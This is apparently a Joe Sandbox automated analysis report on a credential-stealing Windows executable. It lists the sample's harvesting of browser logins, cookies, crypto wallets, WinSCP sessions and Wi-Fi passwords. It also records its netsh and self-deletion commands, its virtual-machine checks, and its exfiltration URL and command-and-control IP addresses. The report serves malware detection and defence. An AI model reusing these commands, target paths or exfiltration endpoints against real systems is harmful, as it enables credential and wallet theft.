      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599672Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599562Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599453Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599343Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599234Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599125Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599015Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598906Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598797Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598684Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598570Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598401Jump to behavior
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
      Source: file.exe, 00000000.00000002.2085420420.000002067E618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
      Source: file.exeBinary or memory string: qemu'@
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
      Source: file.exe, 00000000.00000002.2085420420.000002067E618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
      Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: file.exe, h0R3qT.csReference to suspicious API methods: OpenProcess(1040u, bInheritHandle: false, jil.Id)
      Source: file.exe, h0R3qT.csReference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
      Source: file.exe, bFwG.csReference to suspicious API methods: GetProcAddress(disT, nW)
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 3144, type: MEMORYSTR
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %AppData%\Electrum\wallets
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: >%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %exodus.conf.json;exodus.wallet\*.seco
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: &%LocalAppData%\Coinomi\Coinomi\wallets
      Source: file.exe, 00000000.00000002.2074990140.0000020600582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: dC:\Users\user\AppData\Roaming\ledger live
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 3144, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 3144, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Disable or Modify Tools
      1
      OS Credential Dumping
      1
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts11
      Process Injection
      2
      Obfuscated Files or Information
      1
      Credentials in Registry
      24
      System Information Discovery
      Remote Desktop Protocol2
      Data from Local System
      2
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Timestomp
      Security Account Manager221
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      1
      Non-Standard Port
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS1
      Process Discovery
      Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      File Deletion
      LSA Secrets151
      Virtualization/Sandbox Evasion
      SSHKeylogging3
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Masquerading
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
      Virtualization/Sandbox Evasion
      DCSync1
      System Network Configuration Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
      Process Injection
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550646 Sample: file.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 40 ip-api.com 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 8 other signatures 2->52 8 file.exe 14 6 2->8         started        signatures3 process4 dnsIp5 42 91.223.3.164, 49705, 8080 PL-SKYTECH-ASPL Poland 8->42 44 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 8->44 38 C:\Users\user\AppData\Local\...\file.exe.log, CSV 8->38 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->54 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Tries to steal Mail credentials (via file / registry access) 8->58 60 5 other signatures 8->60 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        18 cmd.exe 1 8->18         started        file6 signatures7 process8 signatures9 62 Uses netsh to modify the Windows network and firewall settings 13->62 64 Tries to harvest and steal WLAN passwords 13->64 20 netsh.exe 2 13->20         started        22 conhost.exe 13->22         started        34 2 other processes 13->34 24 netsh.exe 2 16->24         started        26 conhost.exe 16->26         started        36 2 other processes 16->36 28 conhost.exe 18->28         started        30 timeout.exe 1 18->30         started        32 chcp.com 1 18->32         started        process10

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      file.exe100%AviraHEUR/AGEN.1307453
      file.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://101.126.19.171:4430%Avira URL Cloudsafe
      http://18.228.80.130:800%Avira URL Cloudsafe
      http://168.138.211.88:80990%Avira URL Cloudsafe
      http://47.110.140.182:80800%Avira URL Cloudsafe
      http://47.96.78.224:80800%Avira URL Cloudsafe
      http://167.99.138.249:80800%Avira URL Cloudsafe
      http://185.217.98.121:800%Avira URL Cloudsafe
      http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==0%Avira URL Cloudsafe
      http://66.42.56.128:800%Avira URL Cloudsafe
      https://44.228.161.50:4430%Avira URL Cloudsafe
      http://129.151.109.160:80800%Avira URL Cloudsafe
      http://101.126.19.171:800%Avira URL Cloudsafe
      http://91.223.3.164:8080/sendData0%Avira URL Cloudsafe
      http://95.216.147.179:800%Avira URL Cloudsafe
      http://8.134.71.132:80820%Avira URL Cloudsafe
      http://91.223.3.164:80800%Avira URL Cloudsafe
      http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un0%Avira URL Cloudsafe
      http://46.4.73.118:90000%Avira URL Cloudsafe
      http://91.223.3.164:808020%Avira URL Cloudsafe
      http://101.132.223.26:80800%Avira URL Cloudsafe
      http://45.82.65.63:800%Avira URL Cloudsafe
      http://206.189.109.146:800%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      ip-api.com
      208.95.112.1
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://ip-api.com/line?fields=query,countryfalse
          high
          http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://185.217.98.121:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://138.2.92.67:443file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://107.161.20.142:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://5.196.181.135:443file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://44.228.161.50:443file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://101.43.160.136:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://47.110.140.182:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.99.196.191:443file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://168.138.211.88:8099file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://101.126.19.171:443file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://18.228.80.130:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://66.42.56.128:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://167.99.138.249:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ip-api.comfile.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.00000206000DB000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://185.217.98.121:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://8.219.110.16:9999file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://47.96.78.224:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://129.151.109.160:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://95.216.147.179:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/soap/encoding/file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://154.9.207.142:443file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://8.134.71.132:8082file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.w3.orfile.exe, 00000000.00000002.2074990140.00000206001E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://206.166.251.4:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://194.164.198.113:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ip-api.com/line?fields=queryfile.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://159.203.174.113:8090file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://101.126.19.171:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://91.223.3.164:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://91.223.3.164:8080/sendDatafile.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://116.202.101.219:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://91.223.3.164:80802file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://38.60.191.38:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://46.4.73.118:9000file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&unfile.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://101.132.223.26:8080file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://206.189.109.146:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/wsdl/file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLfile.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://45.82.65.63:80file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://support.mozilla.orgfile.exe, 00000000.00000002.2078691178.000002061014A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2078691178.0000020610152000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://41.87.207.180:9090file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          208.95.112.1
                                                                          ip-api.comUnited States
                                                                          53334TUT-ASUSfalse
                                                                          91.223.3.164
                                                                          unknownPoland
                                                                          201814PL-SKYTECH-ASPLtrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1550646
                                                                          Start date and time:2024-11-07 00:06:06 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 2m 44s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
